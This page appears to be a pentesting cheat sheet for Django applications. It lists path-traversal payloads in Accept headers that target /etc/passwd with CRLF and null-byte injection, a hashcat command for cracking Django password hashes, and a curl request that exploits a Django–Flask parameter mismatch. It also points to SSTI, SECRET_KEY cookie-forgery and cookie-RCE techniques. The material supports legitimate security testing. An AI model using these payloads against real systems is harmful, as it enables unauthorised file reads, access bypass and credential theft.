Django
Django Apps Pentesting
Web Application Header Values
Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{
[DEBUG=True]
SSTI
SSTICookie
Checks django's session cookies (when in signed_cookie mode) for known django secret_key
BadSecrets
Cookie RCE
Leaked SECRET_KEY
Forge Cookie
SECRET_KEY required
Password Cracking
hashcat -m 10000 --force django.hash /usr/share/wordlists/rockyou.txt
Django - Flask: Parameter mismatch
Frontend API: Written in Django
Backend API (internal service): Written in Flask
The frontend
/user
endpoint checks authorization and then proxies the request to Flask for data handling.
curl -X GET "https://target.com/user?user_id=1234" \
-H "Content-Type: application/json" \
-d '{"user_id": 9999}'
Resources
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated